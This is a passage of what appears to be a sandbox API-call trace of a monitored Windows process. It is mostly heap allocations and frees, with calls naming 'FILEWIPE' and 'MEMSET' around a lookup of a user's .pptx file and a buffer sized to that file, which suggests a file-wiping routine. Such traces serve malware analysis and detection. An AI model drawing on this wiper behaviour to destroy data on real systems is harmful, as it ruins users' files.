[0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0168.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0168.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0168.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0168.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0168.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0168.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0168.934] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0168.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0168.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0168.934] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0168.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0168.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0168.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0168.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ad0 [0168.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0168.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0168.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0168.934] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0168.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd648 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0168.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0168.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0168.935] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0168.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0168.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.936] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\dxjhietg4klttzj3vc.pptx")) returned 0x20 [0168.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0168.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.936] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0168.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0168.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0168.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.936] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\dXJHIETG4kltTzJ3VC.pptx", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaa3530, ftCreationTime.dwHighDateTime=0x1d5ccc5, ftLastAccessTime.dwLowDateTime=0x6f08b940, ftLastAccessTime.dwHighDateTime=0x1d5ab25, ftLastWriteTime.dwLowDateTime=0x6f08b940, ftLastWriteTime.dwHighDateTime=0x1d5ab25, nFileSizeHigh=0x0, nFileSizeLow=0xfcf2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="dXJHIETG4kltTzJ3VC.pptx", cAlternateFileName="DXJHIE~1.PPT")) returned 0x90af58 [0168.936] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0168.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0168.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0168.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0168.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0168.937] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0168.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0168.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0168.938] CharLowerBuffW (in: lpsz="byte[64754]", cchLength=0xb | out: lpsz="byte[64754]") returned 0xb [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.938] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0168.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0168.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0168.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xfcf2) returned 0xa6b008 [0168.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0168.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0168.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0168.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0168.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0168.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0168.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0168.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0168.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0168.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0168.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0168.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0168.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0168.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0168.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0168.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0168.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.940] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0168.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.941] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0168.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0168.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0168.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0168.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0168.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0168.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0168.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0168.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18b0 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0168.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0168.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0168.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0168.943] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0168.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0168.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0168.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0168.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0168.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0168.944] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0168.944] 